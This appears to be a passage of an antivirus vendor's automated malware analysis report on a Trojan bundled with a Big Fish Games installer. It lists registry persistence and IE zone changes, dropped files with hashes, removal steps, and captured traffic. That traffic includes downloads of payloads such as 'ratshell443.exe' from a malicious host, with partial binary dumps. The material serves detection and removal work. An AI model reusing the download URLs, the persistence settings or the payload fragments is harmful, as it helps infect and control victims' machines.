The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "70 8F 1E BE D5 94 10 F9 36 BE 03 C5 D3 3C 8F DA"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 44 0B 96 EA 08 30 BC 7F 68 9E AC B0 84 55 26"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:1356 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 32 35 78 D9 64 26 02 77 86 DA AB 72 14 27 11"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:1496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 2B 32 F6 79 DF D7 DE 11 97 C9 8E E9 5E 01 FB"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:964 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 98 C7 AE 54 96 D5 54 81 09 09 A1 11 C7 C6 9E"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 B4 D5 BB 11 CD E8 A7 02 F4 DF E4 CB 97 75 67"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 3A 93 F3 0F A4 63 58 FC 2A 5C 47 31 1D 41 A1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:2024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 C6 89 C6 50 71 1E 52 78 E1 EB 04 58 9A E2 C3"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 EF 4A B4 3D FF 01 E1 5F 16 41 EB 66 EA BC D0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:1100 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 C1 AD 74 56 93 F3 39 54 1A 20 26 62 B4 E2 F7"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 6D 27 EB 29 59 AC AF A0 21 19 BA 70 09 96 49"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:1764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 78 5B DF C3 41 DC E3 E9 E5 C5 42 C8 C3 13 7C"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe:1128 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Big Fish Games\Persistence\Install]
"(Default)" = "{4CFDE078-C665-429D-9A80-1C8F5D0EF06D}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Big Fish Games\Persistence\EnabledToolbars]
"1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 7B F9 92 F0 A7 F4 46 4D 69 BD 47 84 04 6B B7"
[HKLM\SOFTWARE\Big Fish Games]
"Upgraded" = "0"
[HKLM\SOFTWARE\Big Fish Games\Persistence]
"MSFT_DirectX_EULA_Accepted" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Big Fish Games\Client]
"GameClubMember" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| 9a78a4f43e8b5b5d8a902fd62652f31c | c:\Documents and Settings\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe |
| ecdb92b185077fffcd650ea65cf5d510 | c:\Documents and Settings\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe |
| 334b41d348990d25241a5d4aba42391b | c:\Documents and Settings\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe |
| e1d7bc3fcbadd4cf8b5a27b5edad90c2 | c:\Documents and Settings\"%CurrentUserName%"\Application DataFilename.exe |
| 5d9984768c24fda50bc27f26301d414c | c:\Documents and Settings\"%CurrentUserName%"\CrashHandler.exe |
| 3ed972db9e8adf26a3bfd1c038922ffb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE |
| 7ec86b3094b76ab39cfe287b8e3e6737 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE |
| 02d7f5e5dd1512bee2343a21d9970eba | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\NSISdl.dll |
| 959ea64598b9a3e494c00e8fa793be7e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\System.dll |
| d16e06c5de8fb8213a0464568ed9852f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\UserInfo.dll |
| bf1ccc7f5c46e024e800f6c1e9df8206 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\inetc.dll |
| fae3be7a9827eaa3ef9f43832805e110 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\nsProcess.dll |
| 4e1c46e37af4b3ab0036cb1e85c81608 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\uac.dll |
| 689a3befb2abc9a4c968dab1bd33a965 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscD.tmp\AccessControl.dll |
| 959ea64598b9a3e494c00e8fa793be7e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscD.tmp\System.dll |
| d16e06c5de8fb8213a0464568ed9852f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscD.tmp\UserInfo.dll |
| 4e1c46e37af4b3ab0036cb1e85c81608 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscD.tmp\uac.dll |
| cb3897fff233b89fe46c52f4a86636f6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi2.tmp\System.dll |
| f2805a876754590f252130d367f382ff | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi2.tmp\UserInfo.dll |
| cb3897fff233b89fe46c52f4a86636f6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsxA.tmp\System.dll |
| f2805a876754590f252130d367f382ff | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsxA.tmp\UserInfo.dll |
| e1d7bc3fcbadd4cf8b5a27b5edad90c2 | c:\Documents and Settings\"%CurrentUserName%"\Ptype.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE:1060
WScript.exe:368
CrashHandler.exe:420
CrashHandler.exe:680
HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE:1648
bfgsetup_s1_l1.exe:1796
%original file name%.exe:1236
reg.exe:1164
reg.exe:620
reg.exe:232
reg.exe:204
reg.exe:1832
reg.exe:508
reg.exe:1352
reg.exe:1292
reg.exe:280
reg.exe:308
reg.exe:1176
reg.exe:996
reg.exe:468
reg.exe:208
reg.exe:1356
reg.exe:1496
reg.exe:964
reg.exe:904
reg.exe:968
reg.exe:2024
reg.exe:644
reg.exe:1100
reg.exe:544
reg.exe:1764 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Ptype.exe (3312 bytes)
%Documents and Settings%\%current user%\CrashHandler.exe (81017 bytes)
%Documents and Settings%\%current user%\Application DataFilename.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_socket.pyd (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\select.pyd (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcm90.dll (589 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_hashlib.pyd (2341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\Microsoft.VC90.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\unicodedata.pyd (3821 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\win32api.pyd (706 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcp90.dll (2342 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\triple.exe.manifest (731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\python27.dll (16699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcr90.dll (4448 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_ssl.pyd (6386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\bz2.pyd (1137 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\pywintypes27.dll (1098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\UserInfo.dll (3 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe (5731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\System.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\aihgmsvmb.vbs (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~a21524.log (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp\UserInfo.dll (3 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe (1120371 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp\System.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_en.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_fr.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_es.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_sw.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_de.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_de.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_pt.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_dn.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_it.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_it.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_fr.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_pt.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_en.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_jp.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_es.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\AccessControl.dll (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_dn.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_jp.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_du.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_du.ini (3 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\GameManager\log\gamemanager_install_log.txt (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\uac.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxC.tmp (1178954 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\modern-header.bmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_sw.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE (237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\NSISdl.dll (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S1YHUDA9\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\uac.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\inetc.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IJE9GDOV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S5KLKDKJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\nsProcess.dll (4206 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (36 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe (2998318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IRCX4XCX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\System.dll (11 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\GameManager\log\gamestub_t_install_log.txt (37602 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigfishgames[1].txt (318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\throttle.txt (2 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 26860 | 27136 | 4.29791 | ab9512ee7c9f5ad72ae20fba64a6341e |
| .itext | 32768 | 776 | 1024 | 3.22992 | c79df70a8b89425189a65adf4e08a6b8 |
| .data | 36864 | 2040 | 2048 | 0.904367 | 240816d5b34f6e1e38eab9c91fbec05d |
| .bss | 40960 | 11172 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .idata | 53248 | 2246 | 2560 | 2.90066 | 4b57ef8451a1099532bf2707e4ad39e3 |
| .tls | 57344 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rdata | 61440 | 24 | 512 | 0.14174 | 15b26e576cc064822312d1c66bb6f693 |
| .reloc | 65536 | 3612 | 4096 | 4.20936 | 92c609bf93bf264697ab3000df42f30f |
| .rsrc | 69632 | 243268 | 243712 | 5.30233 | 376efca94063269884d49f0950403f04 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://allpokersoftware.net/chromelog.exe | 89.233.106.130 |
| hxxp://allpokersoftware.net/Ptype.exe | |
| hxxp://allpokersoftware.net/ratshell443.exe | |
| hxxp://208.77.152.196/server_time.php |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /Ptype.exe HTTP/1.1
Host: allpokersoftware.net
HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:03:03 GMT
Server: Apache
Last-Modified: Tue, 08 Apr 2014 16:56:32 GMT
Accept-Ranges: bytes
Content-Length: 99328
Connection: close
Content-Type: application/x-msdownload
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m!DS.................z..........N.... ........@.. ....................................@.....................................S.......h............................................................................ ............... ..H............text...Ty... ...z.................. ..`.rsrc...h............|..............@..@.reloc..............................@..B................0.......H.......,d...4......3....9... ..........................................6.(.....o....*...0..!........,..{....,..{....o........(.....*....................0..F........s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....o....o.....o....o.....o....o.....o.....o....(....o.....o....r...p"...A...s....o.....o....(....o.....o........(.....o.....o....r ..po.....o.......K..(.....o.....o.....o.....o....r ..po ....o.....o!....o.....o"....o....(....o.....o....r...p"...A...s....o.....o....(....o.....o........(.....o.....o....rO..po.....o.......X..(.....o.....o.....o.....o....rO..po ....o.....o!....o....(....o#....o....r...p"...A...s....o.....o....(....o$....o.....o%....o........(.....o.....o....r}..po.....o.......y..(.....o.....o.....o.....o.....o&....o....(....o'....o....r...p"...A...s....o.....o....(....o.....o........(.....o.....o....r...po.....o.......-..(.....o.....o.....o.....o....r...po(....o.....o&....o....(
<<
<<< skipped >>>
GET /server_time.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.bigfishgames.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: mkt_code=bfgdefault; afsrc=afxxxxxxxxxx; PHPSESSID=5r93onv1a77cmf81855jfbaah2
HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:03:15 GMT
Server: Apache
Vary: X-Client-IP,Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: mkt_code=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=bfgdefault; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=bfgdefault; path=/; domain=.bigfishgames.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 36
Keep-Alive: timeout=15, max=10000
Connection: Keep-Alive
Content-Type: text/html
{"now":1397743395,"12am":1397718000}....
GET /server_time.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.bigfishgames.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: afsrc=afxxxxxxxxxx; mkt_code=bfgdefault; PHPSESSID=5r93onv1a77cmf81855jfbaah2
HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:03:15 GMT
Server: Apache
Vary: X-Client-IP,Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: mkt_code=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=bfgdefault; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=bfgdefault; path=/; domain=.big
GET /ratshell443.exe HTTP/1.0
Host: allpokersoftware.net
User-Agent: Python-urllib/1.17
HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:03:08 GMT
Server: Apache
Last-Modified: Wed, 02 Apr 2014 21:24:12 GMT
Accept-Ranges: bytes
Content-Length: 5889983
Connection: close
Content-Type: application/x-msdownload
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}..V...V...V....SU.S..._dG.~..._dV.G...q..._...V...'..._d@.....HNW.W..._dR.W...RichV...................PE..L...m.$N.................>...f......A........P....@...................................Z.........................................d.......^...............................................................@............P...............................text....<.......>.................. ..`.rdata...^...P...`...B..............@..@.data...$4..........................@....rsrc...^...........................@..@..................................................................................................................................................................................................................................................................................................................................................................................................x......A.3...$t...SU..$....V..$....Wj.3.j..\$..@Q..j.j..7Q..j.j...Q..j.j..%Q.... .D$0P.D$......\$..D$ ...... PA.......\$4.\$8.\$<.D$\....f.L$`..N..P.G...P.JK...D$p..N.... P./...P.2K...D$|..N....@P.....P..K.....RA.f...RA...$......RA...$.......RA...$......f..$........T$~....@:.u..|$t .O..O.G:.u...........D$t...P..._I......L$ Q.T$4RSSSj.S.D$0P...PA.PU...PA._^][..t4.L$.j.Q...PA..D$...$RP...PA...$..$t...3...S....x....h.QA........$x......3......S....x......................A.3...$....h.....D$.j.P..S.
<<
<<< skipped >>>
GET /chromelog.exe HTTP/1.1
Host: allpokersoftware.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:02:57 GMT
Server: Apache
Last-Modified: Mon, 07 Apr 2014 23:52:52 GMT
Accept-Ranges: bytes
Content-Length: 3666664
Connection: close
Content-Type: application/x-msdownload
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}..V...V...V....SU.S..._dG.~..._dV.G...q..._...V...'..._d@.....HNW.W..._dR.W...RichV...................PE..L...m.$N.................>...d......A........P....@.................................h...........................................d.......h...............................................................@............P...............................text....<.......>.................. ..`.rdata...^...P...`...B..............@..@.data...$4..........................@....rsrc...h...........................@..@..................................................................................................................................................................................................................................................................................................................................................................................................x......A.3...$t...SU..$....V..$....Wj.3.j..\$..@Q..j.j..7Q..j.j...Q..j.j..%Q.... .D$0P.D$......\$..D$ ...... PA.......\$4.\$8.\$<.D$\....f.L$`..N..P.G...P.JK...D$p..N.... P./...P.2K...D$|..N....@P.....P..K.....RA.f...RA...$......RA...$.......RA...$......f..$........T$~....@:.u..|$t 